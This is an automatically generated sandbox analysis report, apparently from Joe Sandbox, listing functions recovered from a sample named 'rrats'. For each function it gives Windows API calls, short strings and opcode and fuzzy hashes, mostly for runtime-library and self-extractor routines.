                                                              • Opcode ID: 5fbe6f84da5016fae0f0ad06b3d8a8e180cabfa1f431c25e050a6e091cf27c39
                                                              • Instruction ID: 13de0d52a234b3e9722d96dec1b1db3ed4de1cb01346f36e9779646f7f2a56a0
                                                              • Opcode Fuzzy Hash: 5fbe6f84da5016fae0f0ad06b3d8a8e180cabfa1f431c25e050a6e091cf27c39
                                                              • Instruction Fuzzy Hash: 0F41A031008314EFCB216FA5EC48BAB7BACEF48711F008559F95A9A156DB34DA54CBA2
                                                              Function 00CB9955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: _wcslen
                                                              • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                              • API String ID: 176396367-3743748572
                                                              • Opcode ID: 01c328b9091117bc375fe59e1bc6941e461c03f0a644141c03929129dc4d890c
                                                              • Instruction ID: aeb9cff46b9f3cbfba9834b029291d1b94580589d7ee34d1338d83c6222083b2
                                                              • Opcode Fuzzy Hash: 01c328b9091117bc375fe59e1bc6941e461c03f0a644141c03929129dc4d890c
                                                              • Instruction Fuzzy Hash: 8A31403264434556DA34AB54AC42BFB73A4EB50720F50842FFAA6972C0FB70EF4193A5
                                                              Function 00CCC8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00CCC868: _free.LIBCMT ref: 00CCC891
                                                              • _free.LIBCMT ref: 00CCC8F2
                                                                • Part of subcall function 00CC8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00CCC896,?,00000000,?,00000000,?,00CCC8BD,?,00000007,?,?,00CCCCBA,?), ref: 00CC8DE2
                                                                • Part of subcall function 00CC8DCC: GetLastError.KERNEL32(?,?,00CCC896,?,00000000,?,00000000,?,00CCC8BD,?,00000007,?,?,00CCCCBA,?,?), ref: 00CC8DF4
                                                              • _free.LIBCMT ref: 00CCC8FD
                                                              • _free.LIBCMT ref: 00CCC908
                                                              • _free.LIBCMT ref: 00CCC95C
                                                              • _free.LIBCMT ref: 00CCC967
                                                              • _free.LIBCMT ref: 00CCC972
                                                              • _free.LIBCMT ref: 00CCC97D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                              • Instruction ID: 8508b89f69b22fdd97d766211fc38b5f9eb3e7f9c7b61647e3a2991f987d99f6
                                                              • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                              • Instruction Fuzzy Hash: 20110D71980B05AAE520B7B1DC87FCB7BBC9F04B00F804C1DF29E660D2DA65E509A750
                                                              Function 00CBE5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00CBE669,00CBE5CC,00CBE86D), ref: 00CBE605
                                                              • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00CBE61B
                                                              • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00CBE630
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$HandleModule
                                                              • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                              • API String ID: 667068680-1718035505
                                                              • Opcode ID: 0421938d4c7277efade8b5b8b26ca7339f29aad1d82403f1907fd04c228025e2
                                                              • Instruction ID: ce3ab5f329f79f99fd185c4e38cdc4581cc7bcbe8256b5c84833195bdee5a488
                                                              • Opcode Fuzzy Hash: 0421938d4c7277efade8b5b8b26ca7339f29aad1d82403f1907fd04c228025e2
                                                              • Instruction Fuzzy Hash: 74F0F635B8176A9F9F224F665C847EAB3C86E25F41B04043AFD15D3340FB10CE50ABA5
                                                              Function 00CB146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CB14C2
                                                                • Part of subcall function 00CAB146: GetVersionExW.KERNEL32(?), ref: 00CAB16B
                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00CB14E6
                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00CB1500
                                                              • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00CB1513
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CB1523
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CB1533
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: Time$File$System$Local$SpecificVersion
                                                              • String ID:
                                                              • API String ID: 2092733347-0
                                                              • Opcode ID: 23132968e417fe9b39d11df200bc3493d4a4737a8e35205c5e93ecc36037a543
                                                              • Instruction ID: 967bfbffa5bbfcdbd7a5123f3705f1f41709e0e06e8edac2e1a57c0fa998103d
                                                              • Opcode Fuzzy Hash: 23132968e417fe9b39d11df200bc3493d4a4737a8e35205c5e93ecc36037a543
                                                              • Instruction Fuzzy Hash: 6931E875108346ABC704DFA8C884A9FB7F8BF98714F444A1EF999C3210E734D649CBA6
                                                              Function 00CC2AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,00CC2AF1,00CC02FC,00CBFA34), ref: 00CC2B08
                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00CC2B16
                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00CC2B2F
                                                              • SetLastError.KERNEL32(00000000,00CC2AF1,00CC02FC,00CBFA34), ref: 00CC2B81
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastValue___vcrt_
                                                              • String ID:
                                                              • API String ID: 3852720340-0
                                                              • Opcode ID: e14b66b75c6ccbda90dd90529c2ed88d31f861e821b463cad64bbba197bd5d6e
                                                              • Instruction ID: 85018138de8df2f37b817aeca30a7f3bd3f3e3f2886447bb7474e985f1c3f899
                                                              • Opcode Fuzzy Hash: e14b66b75c6ccbda90dd90529c2ed88d31f861e821b463cad64bbba197bd5d6e
                                                              • Instruction Fuzzy Hash: 8F01F23221A722AFE6642B75FC95F2F2B99EF41B74B60473FF122590E0EF115E01A244
                                                              Function 00CC97E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastError.KERNEL32(?,00CE1098,00CC4674,00CE1098,?,?,00CC40EF,?,?,00CE1098), ref: 00CC97E9
                                                              • _free.LIBCMT ref: 00CC981C
                                                              • _free.LIBCMT ref: 00CC9844
                                                              • SetLastError.KERNEL32(00000000,?,00CE1098), ref: 00CC9851
                                                              • SetLastError.KERNEL32(00000000,?,00CE1098), ref: 00CC985D
                                                              • _abort.LIBCMT ref: 00CC9863
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$_free$_abort
                                                              • String ID:
                                                              • API String ID: 3160817290-0
                                                              • Opcode ID: 3e50cb498cc611eca23747828d66c7b2230e4fcc60a630e6bcd33f03257d9da0
                                                              • Instruction ID: f17bf1e2931b28f6c61db2aa5de233d0ab31d72a52a63d88c37acc99c74bff15
                                                              • Opcode Fuzzy Hash: 3e50cb498cc611eca23747828d66c7b2230e4fcc60a630e6bcd33f03257d9da0
                                                              • Instruction Fuzzy Hash: D9F0223610160266C6523338FC0EF2F2B69CFD2B35F25003DF629A31D2EE308D06A266
                                                              Function 00CAC0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00CB05DA: _wcslen.LIBCMT ref: 00CB05E0
                                                                • Part of subcall function 00CAB92D: _wcsrchr.LIBVCRUNTIME ref: 00CAB944
                                                              • _wcslen.LIBCMT ref: 00CAC197
                                                              • _wcslen.LIBCMT ref: 00CAC1DF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$_wcsrchr
                                                              • String ID: .exe$.rar$.sfx
                                                              • API String ID: 3513545583-31770016
                                                              • Opcode ID: 64c95a0e6545d86d5038e58d9c1b35e6c030c3e5f2dc538d131159942aa9ad33
                                                              • Instruction ID: c78be7e957c980d7f60fa4192f756ac28eecd9f5481f8abb979c1ee42dc4ec73
                                                              • Opcode Fuzzy Hash: 64c95a0e6545d86d5038e58d9c1b35e6c030c3e5f2dc538d131159942aa9ad33
                                                              • Instruction Fuzzy Hash: 5A414A2260035395C732AF748892A7F73B8EF4375CF24490EFAA1AB182EB504F81D391
                                                              Function 00CABB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _wcslen.LIBCMT ref: 00CABB27
                                                              • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00CAA275,?,?,00000800,?,00CAA23A,?,00CA755C), ref: 00CABBC5
                                                              • _wcslen.LIBCMT ref: 00CABC3B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$CurrentDirectory
                                                              • String ID: UNC$\\?\
                                                              • API String ID: 3341907918-253988292
                                                              • Opcode ID: 7ec7832b75334196feb0079892a18c084da0b25be027c833d2fa1eff0b257954
                                                              • Instruction ID: 6d6100f07a981ebdecf799dcbaee4b6168134376483872e3b58a1aff68e6fb58
                                                              • Opcode Fuzzy Hash: 7ec7832b75334196feb0079892a18c084da0b25be027c833d2fa1eff0b257954
                                                              • Instruction Fuzzy Hash: 0241B271400257A6CF21AFA0DC45EEF77ADAF423ACF108566F924A3152EB70DE90DB60
                                                              Function 00CBB6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadBitmapW.USER32(00000065), ref: 00CBB6ED
                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 00CBB712
                                                              • DeleteObject.GDI32(00000000), ref: 00CBB744
                                                              • DeleteObject.GDI32(00000000), ref: 00CBB767
                                                                • Part of subcall function 00CBA6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00CBB73D,00000066), ref: 00CBA6D5
                                                                • Part of subcall function 00CBA6C2: SizeofResource.KERNEL32(00000000,?,?,?,00CBB73D,00000066), ref: 00CBA6EC
                                                                • Part of subcall function 00CBA6C2: LoadResource.KERNEL32(00000000,?,?,?,00CBB73D,00000066), ref: 00CBA703
                                                                • Part of subcall function 00CBA6C2: LockResource.KERNEL32(00000000,?,?,?,00CBB73D,00000066), ref: 00CBA712
                                                                • Part of subcall function 00CBA6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00CBB73D,00000066), ref: 00CBA72D
                                                                • Part of subcall function 00CBA6C2: GlobalLock.KERNEL32(00000000), ref: 00CBA73E
                                                                • Part of subcall function 00CBA6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00CBA762
                                                                • Part of subcall function 00CBA6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00CBA7A7
                                                                • Part of subcall function 00CBA6C2: GlobalUnlock.KERNEL32(00000000), ref: 00CBA7C6
                                                                • Part of subcall function 00CBA6C2: GlobalFree.KERNEL32(00000000), ref: 00CBA7CD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                              • String ID: ]
                                                              • API String ID: 1797374341-3352871620
                                                              • Opcode ID: 2b494df56d3920df9ea3c3f1015dda3aea372981504f0ae59846948cfd8bfe17
                                                              • Instruction ID: 5b4e8d45838a0c7ec352cec0c72baf0b21128e0c484c18b9dee482ec54b93652
                                                              • Opcode Fuzzy Hash: 2b494df56d3920df9ea3c3f1015dda3aea372981504f0ae59846948cfd8bfe17
                                                              • Instruction Fuzzy Hash: 7401C03654060167C7227B799C49BEF7ABE9FC0B52F080011F954B7291EFB18E0992B1
                                                              Function 00CBD600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00CA1316: GetDlgItem.USER32(00000000,00003021), ref: 00CA135A
                                                                • Part of subcall function 00CA1316: SetWindowTextW.USER32(00000000,00CD35F4), ref: 00CA1370
                                                              • EndDialog.USER32(?,00000001), ref: 00CBD64B
                                                              • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00CBD661
                                                              • SetDlgItemTextW.USER32(?,00000066,?), ref: 00CBD675
                                                              • SetDlgItemTextW.USER32(?,00000068), ref: 00CBD684
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: ItemText$DialogWindow
                                                              • String ID: RENAMEDLG
                                                              • API String ID: 445417207-3299779563
                                                              • Opcode ID: 475e166afa11cd7d0fc3d8a3bd0142fc13e3af8364cc5b21d7bae888416d9d91
                                                              • Instruction ID: 4aa975e44746168b96666356d736db2530eec7aeb260e432002e814da747f6b1
                                                              • Opcode Fuzzy Hash: 475e166afa11cd7d0fc3d8a3bd0142fc13e3af8364cc5b21d7bae888416d9d91
                                                              • Instruction Fuzzy Hash: F8012833345314BAD2204F659D09FAB776CEB5AB02F010815F30AE21D0D6A29A05CB7A
                                                              Function 00CC7E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00CC7E24,?,?,00CC7DC4,?,00CDC300,0000000C,00CC7F1B,?,00000002), ref: 00CC7E93
                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00CC7EA6
                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00CC7E24,?,?,00CC7DC4,?,00CDC300,0000000C,00CC7F1B,?,00000002,00000000), ref: 00CC7EC9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                              • String ID: CorExitProcess$mscoree.dll
                                                              • API String ID: 4061214504-1276376045
                                                              • Opcode ID: 1abb006dd0b90c6dafa6c5b975f0c25d1f392bbf8cbd535e2e5c41e0e5876e49
                                                              • Instruction ID: 28c4c29bdd070b225f58ec9bb95bf3b17e533bf6c5a75b0a75da8c4e012b81f2
                                                              • Opcode Fuzzy Hash: 1abb006dd0b90c6dafa6c5b975f0c25d1f392bbf8cbd535e2e5c41e0e5876e49
                                                              • Instruction Fuzzy Hash: D5F06232A01218BFCB11AFA0DC09F9EBFB4EF44715F0181AEF805A2261DB309F40CA91
                                                              Function 00CAF2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00CB081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00CB0836
                                                                • Part of subcall function 00CB081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00CAF2D8,Crypt32.dll,00000000,00CAF35C,?,?,00CAF33E,?,?,?), ref: 00CB0858
                                                              • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00CAF2E4
                                                              • GetProcAddress.KERNEL32(00CE81C8,CryptUnprotectMemory), ref: 00CAF2F4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                              • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                              • API String ID: 2141747552-1753850145
                                                              • Opcode ID: 31615e601d845bf366671cd0f1c322884fa74fc3beb4601ca3c7ac3b0770d98b
                                                              • Instruction ID: 9c2f9bae2332ffe9c56ff24ddc06d72be09da4a63fa0e76a648bca5be565db00
                                                              • Opcode Fuzzy Hash: 31615e601d845bf366671cd0f1c322884fa74fc3beb4601ca3c7ac3b0770d98b
                                                              • Instruction Fuzzy Hash: 06E0DF74A017829ECB209BB4984CB027BD46F04704F14C82EE1DA93250C7B0E2408B21
                                                              Function 00CC2BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AdjustPointer$_abort
                                                              • String ID:
                                                              • API String ID: 2252061734-0
                                                              • Opcode ID: 36f50f7580eb2a7f84101a060b748183aa8a899630c01de5ffd0478a18021cd1
                                                              • Instruction ID: 77b8e03d1baa0dae9727ea2e62b0f9c5191eb5af56ca597b3f63b58f614f12e1
                                                              • Opcode Fuzzy Hash: 36f50f7580eb2a7f84101a060b748183aa8a899630c01de5ffd0478a18021cd1
                                                              • Instruction Fuzzy Hash: 1851C171600212AFEB298F14D845FBAB7B4FF64710F24452EEC16876A1D731EE81E790
                                                              Function 00CCBF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetEnvironmentStringsW.KERNEL32 ref: 00CCBF39
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CCBF5C
